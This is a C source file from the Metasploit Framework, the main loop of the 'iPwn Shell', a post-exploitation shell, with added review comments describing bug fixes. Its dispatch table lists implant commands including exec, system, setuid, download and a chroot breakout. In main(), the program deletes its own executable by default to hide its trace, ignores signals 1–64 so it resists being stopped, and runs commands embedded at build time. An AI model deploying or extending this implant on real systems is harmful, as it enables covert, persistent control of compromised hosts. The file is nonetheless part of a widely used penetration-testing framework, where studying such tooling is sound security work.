GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/ipwn/main.c
/*
* Copyright (c) 2004-2005 vlad902 <vlad902 [at] gmail.com>
* Copyright (c) 2007 H D Moore <hdm [at] metasploit.com>
* This file is part of the Metasploit Framework.
* $Revision$
*/
#include <sys/types.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdio.h>
#include <signal.h>
#include "cmd.h"
#include "auto.h"
/*
 * One row of the command dispatch table.
 *
 * `handler` is declared without a prototype because process_input() calls
 * it in two different shapes: (argc, argv) when arg_process is non-zero,
 * and (char *) with the raw text after the command word when it is zero.
 * The compiler therefore cannot check either call against the handler's
 * real signature.
 */
struct __cmdhandler
{
    char *cmd;                  /* command word compared against argv[0] */
    void (*handler)();          /* unprototyped on purpose, see above */
    unsigned int arg_process;   /* non-zero: pass argc/argv; zero: pass raw tail */
    unsigned int arg_min;       /* fewest arguments accepted, command word excluded */
    unsigned int arg_max;       /* most arguments accepted, command word excluded */
};
/*
 * Dispatch table scanned by process_input(): the first word of an input
 * line is compared with each `cmd` string and the matching handler runs.
 *
 * Columns: command word, handler, arg_process, arg_min, arg_max.
 * Rows with arg_process == 0 (getpid, getppid, ps) are not range-checked
 * and receive the raw text after the command word instead of argc/argv.
 *
 * This is the full set of command words the shell accepts, so it doubles
 * as an inventory of what a deployed copy exposes. The group labels below
 * follow the blank-line groups of the original and are inferred from the
 * command names only; the handlers themselves live outside this file.
 */
struct __cmdhandler handlerlist[] =
{
    /* shell control and process launch */
    { "help",               cmd_help,               1, 0, 0  },
    { "script",             cmd_script,             1, 1, 1  },
    { "fork",               cmd_fork,               1, 0, 0  },
    { "exec",               cmd_exec,               1, 1, 14 },
    { "system",             cmd_system,             1, 1, 14 },
    { "quit",               cmd_quit,               1, 0, 0  },
    { "exit",               cmd_quit,               1, 0, 0  },

    /* file descriptors */
    { "open",               cmd_open,               1, 1, 1  },
    { "lseek",              cmd_lseek,              1, 3, 3  },
    { "read",               cmd_read,               1, 1, 2  },
    { "write",              cmd_write,              1, 1, 2  },
    { "close",              cmd_close,              1, 1, 1  },
    { "dup",                cmd_dup,                1, 1, 1  },
    { "dup2",               cmd_dup2,               1, 2, 2  },

    /* filesystem */
    { "ls",                 cmd_ls,                 1, 0, 1  },
    { "getcwd",             cmd_getcwd,             1, 0, 0  },
    { "pwd",                cmd_getcwd,             1, 0, 0  },
    { "cd",                 cmd_setcwd,             1, 0, 1  },
    { "chmod",              cmd_chmod,              1, 2, 2  },
    { "chown",              cmd_chown,              1, 2, 2  },
    { "chgrp",              cmd_chgrp,              1, 2, 2  },
    { "chdir",              cmd_chdir,              1, 1, 1  },
    { "mkdir",              cmd_mkdir,              1, 1, 2  },
    { "rmdir",              cmd_rmdir,              1, 1, 1  },
    { "rename",             cmd_rename,             1, 2, 2  },
    { "unlink",             cmd_unlink,             1, 1, 1  },
    { "chroot",             cmd_chroot,             1, 1, 1  },
    { "link",               cmd_link,               1, 2, 2  },
    { "symlink",            cmd_symlink,            1, 2, 2  },
    { "cp",                 cmd_cp,                 1, 2, 2  },

    /* process identity */
    { "getid",              cmd_getid,              1, 0, 0  },
    { "setuid",             cmd_setuid,             1, 1, 1  },
    { "setgid",             cmd_setgid,             1, 1, 1  },

    /* processes */
    { "kill",               cmd_kill,               1, 1, 2  },
    { "getpid",             cmd_getpid,             0, 0, 0  },
    { "getppid",            cmd_getppid,            0, 0, 0  },
    { "ps",                 cmd_ps,                 0, 0, 0  },

    /* system */
    { "time",               cmd_time,               1, 0, 0  },
    { "uname",              cmd_uname,              1, 0, 0  },
    { "hostname",           cmd_hostname,           1, 0, 1  },
    { "reboot",             cmd_reboot,             1, 0, 0  },
    { "shutdown",           cmd_shutdown,           1, 0, 0  },
    { "halt",               cmd_halt,               1, 0, 0  },

    { "lsfd",               cmd_lsfd,               1, 0, 0  },

    { "download",           cmd_download,           1, 2, 2  },

    { "fchdir_breakchroot", cmd_fchdir_breakchroot, 1, 1, 1  },
};
/* Number of rows in handlerlist[], derived from the array itself. */
#define HANDLERLIST_SIZE (sizeof(handlerlist) / sizeof(handlerlist[0]))
/* Token limit used by parse() and the argv array in process_input(). */
#define MAX_ARGV 15
/* Version string printed in the start-up banner. */
#define VERSION "0.01"
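/*
 * Entry point. In order: optional removal of the program's own file,
 * replay of commands embedded at build time in `automatic` (from auto.h),
 * signal setup, banner, then an endless read-and-dispatch loop on stdin.
 *
 * Changes from the previous version: the strdup() of `automatic` is
 * checked before use, the never-read cmd_bak copy of each input line is
 * gone, and the printf/process_input arguments are cast to the types the
 * callee expects.
 *
 * Does not return; the loop ends through exit(0) on EOF or through a
 * handler.
 */
int main(int argc, char **argv) {
    char *p, *s, *b;
    int sig;

    /*
     * Unless the first argument is exactly "-k", the program unlinks the
     * path it was started as. The process keeps running afterwards, so the
     * trace left on the host is a live process whose executable path no
     * longer exists on disk. The unlink() result is not checked.
     */
    if (argc <= 1 || strcmp(argv[1], "-k") != 0) {
        printf("Self-destruction mode is enabled by default, use -k to keep.\n");
        printf("Removing %s...\n", argv[0]);
        unlink(argv[0]);
    }

    /* process any embedded commands */
    if (automatic[0] != '#') {
        /* Work on a private copy: the lines are split in place below. */
        b = strdup(automatic);
        if (b == NULL) {
            /* Previously a failed strdup() went straight into strstr(). */
            printf("(auto) skipped: %s\n", strerror(errno));
        } else {
            s = b;
            while ((p = strchr(s, '\n')) != NULL) {
                *p = '\0';

                printf("(auto) %s\n", s);
                process_input(s, (int)strlen(s));

                s = p + 1;
            }

            /* Text after the last newline (possibly empty) runs as well. */
            printf("(auto) %s\n", s);
            process_input(s, (int)strlen(s));

            free(b);
        }
    }

    /* XXX: Big negative sbrk() to remove heap? */
    /* Ignore signals 1..64; failures for individual numbers are not checked. */
    for (sig = 1; sig <= 64; sig++) {
        signal(sig, SIG_IGN);
    }

    /* SIGCHLD is the exception: exited children are reaped by the handler. */
    signal(SIGCHLD, &sig_chld_waitpid);

    /* Unbuffered stdout so the prompt appears without a trailing newline. */
    setvbuf(stdout, (char *)NULL, _IONBF, 0);

    /*
     * NOTE(review): banner spacing is reproduced as it appears in this
     * listing; confirm it against the repository copy.
     */
    printf(
        " __________________\n"
        "< iPwn Shell v%s >\n"
        " ------------------\n"
        " \\ ^__^\n"
        " \\ (00)\\_______\n"
        " (__)\\ )\\/\\\n"
        " ||----w |\n"
        " || ||\n\n", VERSION);

    while (1) {
        char cmd[2048];
        char buf[1024];
        char *cwd;

        if (getcwd(buf, sizeof(buf)) == NULL) {
            cwd = "(unknown)";
        } else {
            cwd = buf;
        }

        /* uid_t is not guaranteed to be int; cast to match %d. */
        printf("ipwn (uid=%d) (%s) > ", (int)getuid(), cwd);

        memset(cmd, 0, sizeof(cmd));
        if (fgets(cmd, sizeof(cmd), stdin) == NULL) {
            exit(0);
        }

        chomp(cmd);

        process_input(cmd, (int)sizeof(cmd));
    }
}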
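/*
 * Split one input line into words and run the matching handlerlist[] entry.
 *
 * cmd      - NUL-terminated line; parse() modifies it in place.
 * cmd_size - accepted for interface compatibility, not used.
 *
 * Returns 0 in every case, including unknown commands and argument-count
 * errors, which are reported on stdout.
 *
 * Fixes relative to the previous version:
 *  - argv has MAX_ARGV + 1 zeroed slots, so a terminator stored at index
 *    MAX_ARGV stays inside the array and the vector is NULL-terminated
 *    even for a single-word line.
 *  - The raw copy of the line is taken BEFORE parse() runs. It used to be
 *    taken afterwards, when the first space had already been replaced by
 *    NUL, so handlers with arg_process == 0 were handed a pointer past the
 *    end of that copy.
 *  - A failed strdup() no longer feeds NULL into pointer arithmetic.
 *  - The scan stops at the first matching row (command words are unique).
 */
int process_input(char *cmd, int cmd_size) {
    char *argv[MAX_ARGV + 1] = { NULL };
    char empty[1] = "";
    char *raw;
    int argc;
    int hit = 0;
    size_t i;

    (void)cmd_size;

    /* Untouched copy of the line for handlers that want the raw tail. */
    raw = strdup(cmd);

    parse(cmd, &argc, argv);
    if (argc == 0) {
        free(raw);
        return 0;
    }

    for (i = 0; i < HANDLERLIST_SIZE; i++) {
        if (strcmp(argv[0], handlerlist[i].cmd) != 0) {
            continue;
        }

        hit = 1;

        if (handlerlist[i].arg_process) {
            /* argc counts the command word, hence the +1 on both bounds. */
            if ((unsigned int)argc > handlerlist[i].arg_max + 1) {
                printf("%s: Too many arguments\n", argv[0]);
            } else if ((unsigned int)argc < handlerlist[i].arg_min + 1) {
                printf("%s: Too few arguments\n", argv[0]);
            } else {
                handlerlist[i].handler(argc, argv);
            }
        } else {
            /*
             * Raw mode: pass whatever follows the command word and one
             * separator. Fall back to an empty, writable string when there
             * is nothing after the word or the copy could not be made.
             */
            size_t skip = strlen(handlerlist[i].cmd);
            char *tail = empty;

            if (raw != NULL && strlen(raw) > skip) {
                tail = raw + skip + 1;
            }
            handlerlist[i].handler(tail);
        }
        break;
    }

    if (hit == 0) {
        printf("%s: Unknown command.\n", argv[0]);
    }

    free(raw);

    return 0;
}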
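/*
 * Split `str` in place into space-separated words.
 *
 * str  - NUL-terminated line; spaces become NUL bytes and backslashes are
 *        removed, so the buffer is modified.
 * argc - receives the number of words stored (0 for an empty line).
 * argv - receives pointers into `str`; must have room for MAX_ARGV entries.
 *        The vector is always NULL-terminated within those MAX_ARGV slots,
 *        so at most MAX_ARGV - 1 words are stored.
 *
 * A backslash makes the following character literal (this is how a space
 * is kept inside a word); no escape sequences are interpreted. Consecutive
 * spaces yield empty words.
 *
 * Fixes relative to the previous version:
 *  - The terminator used to be written at argv[MAX_ARGV], one slot past a
 *    MAX_ARGV-sized array, whenever a line held MAX_ARGV - 1 or more
 *    spaces. Splitting now stops while the terminator still fits, and the
 *    rest of the line stays, unprocessed, in the last word.
 *  - A backslash as the final character used to move the scan pointer past
 *    the string's NUL, so scanning continued into whatever followed the
 *    string in memory. The scan now stops there.
 *  - argv[1] is set to NULL for a single-word line, which was previously
 *    left unterminated.
 */
void parse(char * str, int * const argc, char * argv[])
{
    *argc = 0;
    argv[0] = NULL;

    if (*str == '\0') {
        return;
    }

    argv[(*argc)++] = str;
    argv[*argc] = NULL;

    for (; *str != '\0'; str++) {
        if (*str == ' ') {
            /* Keep one slot free for the NULL terminator. */
            if (*argc >= MAX_ARGV - 1) {
                break;
            }
            *str = '\0';
            argv[(*argc)++] = str + 1;
            argv[*argc] = NULL;
        }
        if (*str == '\\') {
            /* strlen(str) bytes from str + 1 include the trailing NUL. */
            memmove(str, str + 1, strlen(str));
            if (*str == '\0') {
                /* Trailing backslash: nothing left to scan. */
                break;
            }
            /* The loop increment now steps over the escaped character. */
        }
    }
}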
/*
 * Strip one trailing "\n" and then one trailing "\r" from `str`, in place.
 * "\r\n" and "\n" endings are both removed; a second "\n" or a "\n" that
 * precedes a final "\r" is left alone.
 */
void chomp(char * str)
{
    size_t len = strlen(str);

    if (len > 0 && str[len - 1] == '\n') {
        str[--len] = '\0';
    }
    if (len > 0 && str[len - 1] == '\r') {
        str[--len] = '\0';
    }
}
/*
 * SIGCHLD handler that does nothing. Not referenced in this file; main()
 * installs sig_chld_waitpid() instead.
 */
void sig_chld_ignore(int signal)
{
    (void)signal;
}
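/*
 * SIGCHLD handler: collect every child that has already exited, without
 * blocking, so none is left as a zombie.
 *
 * errno is saved and restored around the loop. waitpid() sets errno when
 * no child is left, and without the restore that value would overwrite
 * the errno of whatever call the signal interrupted.
 */
void sig_chld_waitpid(int signal)
{
    int saved_errno = errno;

    (void)signal;

    while (waitpid(-1, NULL, WNOHANG) > 0) {
        /* keep reaping until nothing is ready */
    }

    errno = saved_errno;
}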